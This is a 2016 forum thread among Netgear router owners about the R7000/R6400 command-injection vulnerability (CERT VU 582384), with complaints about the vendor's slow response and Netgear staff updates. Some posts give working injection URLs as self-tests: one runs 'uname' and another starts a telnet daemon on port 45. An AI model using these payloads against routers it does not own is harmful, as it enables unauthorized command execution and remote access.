Re: Two leading Netgear routers are vulnerable to a severe security flaw

3v3ntH0riz0n · ‎2016-12-10

You can test it yourself by using that url.

Login to your router, and find out the ip of it. Then replace the ip with that test url. If you get can't be found or access denied then you are good, if you get anything else, then it's vunerable.

http://[router-address]/cgi-bin/;uname$IFS-a

Link to the article: http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/

alokeprasad · ‎2016-12-11

If I go to

http://192.168.1.1/cgi-bin/;uname$IFS-a

I get (HTTP 404 Not Found) error. I'm doing this from inside my LAN.

Is this a valid test? Do I need to test from the WAN side (from the internet)?

Captiva · ‎2016-12-11

Very difficult if not impossible for 99% of Netgear customers (Costco, Amazon, Wal-Mart, Target shoppers) to comprehend and implement. Vendor solution is needed.

climb74 · ‎2016-12-11

So what is the timeline to a patch? After spending over 200 bucks for a router I expect that the vendor is going to support their product. Fair warning, I will be very vocal about my dissatisfaction if I have to go out and buy a new router. Considering I have an extensive career in Information Security, my voice may carry some weight... The current lack of response is disconcerting to say the least considering that there is an exploit available in the wild.

3v3ntH0riz0n · ‎2016-12-11

I think it's safe to say, your router is not vunerable to the web service attack. There is another, but not sure how you would stop that or test it.

Here is the telnet test:

http://RouterIP/;telnetd$IFS-p$IFS'45'

will open telnet on port 45.

3v3ntH0riz0n · ‎2016-12-11

Agree. Especially since there were a lot of discounts on this item since black friday and articles telling consumers its one of the best devices you could buy at the time.

3v3ntH0riz0n · ‎2016-12-11

I would recommend twitter, to voice concern (netgearhelp I think it the tag). We could also post to review sites (amazon.com, newegg, and even netgears site). Use social media, like FB to post reviews or rank the item. This might get their attention. This bug has been known about since Friday, and Netgear has yet to respond. Unacceptable.

climb74 · ‎2016-12-11

There are a number of security sites that garner a lot of attention as well... though a number of them already have this issue in their sights along with mainstream tech sites. ZDNet is just the tip of the proverbial iceberg. I find it odd that the only response from a Netgear representative on their own forum was to attempt to discredit CERT as a source. Calling Carnegie Mellon University's public vulnerability database (CERT) a "third party" is a bit of a stretch... I wonder what sort of agenda they think a reputable university and The Department of Homeland Security are trying to push... I sincerely doubt either "third party" have any vested interest in a Netgear competitor.

That said... I don't know how much weight our threats of going to the media will have anymore now that SlashDot, ComputerWorld, and Network World have gotten a hold of this story. This story has gotten legs, and if Netgear doesn't get ahead of this they are going to be in serious trouble. Personally I will give them two business days at most before I drop support for them entirely and search for a more secure router vendor. Many of us Security Architects work from home. The last thing we need are unsupported border devices with egregious security flaws. The least they should do is provide a workaround as of yesterday!

virtigex · ‎2016-12-11

According to https://mobile.slashdot.org/story/16/12/11/1832234/vulnerability-prompts-warning-stop-using-netgear-... 'Proof-of-concept exploit code was released by a Twitter user who, according to the article, said "he informed Netgear of the flaw more than four months ago, but did not hear back from the company since then."' Netgear needs to fix the vunerability and explain why it has not done so in the last four months.

kochin · ‎2016-12-11

I got a response from Netgear this morning at 2:39am. They must be working hard to get it resolved. But, the message isn't saying much.

We appreciate you contacting us. Currently we are working on a fix and will get back to you when it’s available. Thanks.

If you have any questions or comments with regard to this information, please contact us at: security@netgear.com.

Sincerely,

Product Security Incident Response Team
Netgear, Inc

alokeprasad · ‎2016-12-11

@3v3ntH0riz0n wrote:
I think it's safe to say, your router is not vunerable to the web service attack. There is another, but not sure how you would stop that or test it.

Here is the telnet test:

http://RouterIP/;telnetd$IFS-p$IFS'45'

will open telnet on port 45.

That gives me

No such file or directory

alokeprasad · ‎2016-12-11

@kochin wrote:
I got a response from Netgear this morning at 2:39am. They must be working hard to get it resolved. But, the message isn't saying much.

Probably means that is from a tech center in India or something ....

mdgm-ntgr · ‎2016-12-11

The point I was trying to make was that the comment suggesting stopping using the devices was not made by NETGEAR and only that. I wanted to clarify that as a post suggested it was.

mdgm-ntgr · ‎2016-12-11

NETGEAR is aware of the security issue #582384 affecting R6250, R6400, R6700, R6900, R7000, R7100LG, R7300DST, R7900, R8000, D6220, D6400 routers. Stay updated here: http://kb.netgear.com/000036386/CVE-2016-582384

We now have beta firmware containing fixes for some affected models.

We're working hard on fixes for the other affected models and will update the security ticket above soon.

**** UPDATE from NETGEAR - Added by ChristineT on 12/15/16 at 10:30 AM PST ****

To our NETGEAR Community, we sincerely apologize for any complications you may have encountered due to the recently publicized vulnerability, referred to as VU 582384. We initially became aware of this vulnerability last Friday when CERT emailed us, and because we had no record of a prior report, we began our standard process of validation prior to making any public statements.

Once it had been disclosed that the first notification actually occurred in August, we conducted a search and confirmed this was the case. Admittedly, this was an oversight on our part. While no security reporting system is perfect, we aim to do better, and are evaluating how to improve our response process.

NETGEAR has created a channel for security researchers and other members of the public to contact us regarding potential security issues affecting NETGEAR products (security@netgear.com), which is publicly disclosed from the NETGEAR Product Security Advisory page. We receive numerous emails through this channel, the overwhelming majority of which, on review, do not raise product security issues. When we do recognize that there is a security risk to our customers, we work diligently to address them in a timely manner, as we have done in this case since learning about it last Friday.

Security Advisory for VU 582384 knowledgebase article.

NETGEAR Product Security Advisory page.

3v3ntH0riz0n · ‎2016-12-11

You are probably good.

3v3ntH0riz0n · ‎2016-12-11

You are probaly safe.

3v3ntH0riz0n · ‎2016-12-11

Thanks for responding after several days. /sarcasm How about a tweet or something, or do you want to try and keep this under wraps?

mdgm-ntgr · ‎2016-12-12

I would have liked the Security Advisory to have been posted sooner, but that's out of the control of our moderation team.

A colleague has already tweeted about this and responded to a thread on a popular site that's seeing a lot of activity on this.

As our security team's investigation progresses they will make further decisions.

alokeprasad · ‎2016-12-12

Hi mdgm,

Is it true that Netgear was informed of this 4 months ago (per link below)?

https://mobile.slashdot.org/story/16/12/11/1832234/vulnerability-prompts-warning-stop-using-netgear-...

Aloke

(Still using the SPARc ReadyNAS Duo!)

StaticFX · ‎2016-12-12

Hi.. just saw this news on another site..

Thanks for the tips above, I have disabled the server as suggested. But I have a question

If you go to the R7000 downloads its showing the official FW as

R7000 Firmware Version 1.0.1.22

http://kb.netgear.com/en_US/23857/

is that a safe version? the date was 11/28/2016... seems like a much earlier version?

Unfiltered1 · ‎2016-12-12

Is there a way to tell if a router has been breached by a hacker?

Gandolph · ‎2016-12-12

Wont work with Merlin software installed, also the Asus-wrt/Merlin software is more reliable and faster. Not sure why anyone would continue to use Netgear's terrible firmware at this point.

If I had purchased the Arlo cameras hoping to use the R7000 as my base station I would cut my losses and run, at some point you have to quit throwing good money after bad.

RC0101-2 · ‎2016-12-12

Does this affect the r8500?

StaticFX · ‎2016-12-12

@Gandolph - i forgot about wrt etc... do you have the link handy?

climb74 · ‎2016-12-12

Gandolf, please supply more info regarding the asus-wrt/merlin firmware.